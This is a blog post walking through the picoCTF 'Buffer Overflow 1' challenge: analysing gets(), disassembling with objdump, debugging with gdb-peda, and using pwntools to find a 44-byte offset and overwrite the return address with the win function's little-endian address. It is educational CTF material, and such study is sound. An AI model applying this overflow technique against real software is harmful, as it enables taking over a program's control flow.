In the Introduction to Information Security (IIS) course taken in OMSCS, I learned a lot about Buffer Overflow. Therefore, I will organize the solutions based on an actual CTF problem.
Overall
During my second course in OMSCS, I solved a Buffer Overflow problem in the Introduction to Information Security (IIS) course. Since I gained a lot of insights from this experience, I decided to summarize the solution. For more details about the IIS course, please refer to the following article:
CS 6035 Introduction to Information Security
The Buffer Overflow problem I am solving this time is based on an actual CTF challenge. CTF (Capture the Flag) is a contest where participants exploit vulnerabilities to capture flags. I referred to picoCTF, a permanent CTF platform, as there was a problem that seemed to apply what I learned in class. picoCTF hosts CTF challenges aimed at middle and high school students, so it is said that many of the problems are relatively simple. I solved the Buffer Overflow 1 problem in the Binary Exploitation category of picoCTF. I logged into picoCTF and worked on the problem in a web shell.
Note: This post is not intended for actual attacks; the purpose of this introduction is to raise awareness of these types of attacks.
Source Code
First, upon examining the source code, we see that the vuln
function is called from main
, and the gets
function is used to read into the buffer buf
. In the vuln
function, there is an operation that prints the return address. The return address is a record of where the program should return after a function call.
Additionally, it is observed that the win
function is defined but not referenced from anywhere. The source code is as follows:
The return address is explained here:
Call Stack
As for the gets
function, it allows for a string input that cannot be defined in advance, making it possible to execute a Buffer Overflow.
Essential Guide to the gets
Function in C with 10 Clear Examples
When executing the binary file, it is confirmed that the return address of the vuln
function is printed, which is 0x804932f
.
|
|
Disassemble
To understand why the return address of the vuln
function is 0x804932f
, we can disassemble the compiled executable using objdump
and convert it into assembly language for verification.
The following command allows for the disassembly of the executable file named vuln
:
|
|
For instructions on how to disassemble an ELF executable file with the corresponding C source code using objdump
, refer to the following link:
How to Disassemble an ELF Executable with C Source Code Using objdump
When examining the main
section of vuln.asm
, it is observed that the vuln
function is called at 0x804932a
. Therefore, when the executable is run, the return address from the vuln
function back to main
is the address following 0x804932a
, which is 0x804932f
.
In order to obtain the flag this time, it is necessary to overwrite this return address with the address of the win
function and perform a call to a function that would not normally be executed.
Debug
While it is possible to debug using gdb
, its readability is not very high. Therefore, I installed gdb-peda
by following the steps outlined below:
Using the gdb Debugger
As described in the link above regarding the usage of gdb
, when debugging begins, you can set breakpoints using the b
command. I set a breakpoint for the vuln
function as follows. Additionally, with gdb-peda
, it is possible to display registers, code, and stack all at once.
|
|
When entering the vuln
function, I checked the top of the stack, which showed the value 0xfffef54c
. From this, I was able to confirm the return address, which is 0x804932f
. The result of the info frame
command also indicates that the saved EIP (Extended Instruction Pointer) is 0x804932f
, which, as noted in the following information, represents the return address.
saved eip “0x804869a” is the so called “return address”, i.e., the instruction to resume in the caller stack frame after returning from this callee stack. It is pushed onto the stack upon the “CALL” instruction (save it for return).
How to interpret GDB “info frame” output?
When I input the string test
, I observed the value 0xfffef520
, confirming that the string “test” is stored at the address 0xfffef520
.
To summarize, the return address of the vuln
function is stored at 0xfffef54c
. Since the stack grows downwards as execution progresses, the buffer (buf
) is stored at 0xfffef520
. The difference between these addresses is calculated as follows:
0xfffef54c - 0xfffef520 = 0x2c
This indicates that the return address exists 44 bytes away from the buffer at 0xfffef520
. As a result, it appears possible to overwrite the return address by providing an input that consists of 44 bytes of arbitrary characters followed by the address of the win
function.
Solution
After confirming the addresses above and calculating the position of the return address within the input, it is possible to efficiently verify this using the Python library pwntools
. By utilizing the cyclic
function in pwntools
, we can generate a pattern string as follows:
|
|
When I execute the generated pattern string as input to the target executable in gdb
, I can see that the return address has been overwritten to 0x6161616c
.
|
|
Since the return address has been overwritten to 0x6161616c
, we can utilize the cyclic_find
function to determine the position of 0x6161616c
within the generated string. This allows us to confirm which character corresponds to the return address and how many characters precede it. The result is as follows:
We obtain a string length of 44 characters, which confirms that the return address indeed corresponds to 44 bytes, aligning with our previous calculations regarding the addresses. Therefore, we simply need to append the return address of the win
function to this string.
|
|
To obtain the address of the win
function, I will re-examine the disassembled vuln.asm
. It is determined that the win
function starts at 0x080491f6
. Therefore, I will append 0x080491f6
to the previously obtained 44-byte string.
The address of the win
function is 0x080491f6
. However, since it is in little-endian format, the bytes are handled from the least significant byte to the most significant byte. Therefore, 0x080491f6
should be represented in reverse order for input, resulting in \xf6\x91\x04\x08
.
|
|
Therefore, by constructing the input as follows, it becomes possible to call the win
function:
|
|
It has been confirmed that the return address has been successfully overwritten with the address of the win
function. After the execution of vuln
completes, the program does not return to main
, but instead directly calls the win
function. This behavior confirms that the exploit was successful.
In picoCTF, it is necessary to pass the constructed input to the specified instance to retrieve the flag. By executing the following command, you can successfully obtain the flag:
|
|
In cases where the flag can be obtained by passing input to the executable, it is also possible to accomplish this entirely within Python. You can use the following script:
|
|
[Summary of Pwntools Functions and Usage [Japanese]#CTF #Pwn] (https://qiita.com/8ayac/items/12a3523394080e56ad5a)
Reflection
This experience provided a great opportunity to touch on registers and assembly language. By performing debugging, I was able to verify the behavior of the stack and the role of the return address, which deepened my understanding of how programs operate. I believe that the knowledge gained from this experience will serve as a valuable introduction when I learn more in-depth topics in future OS classes.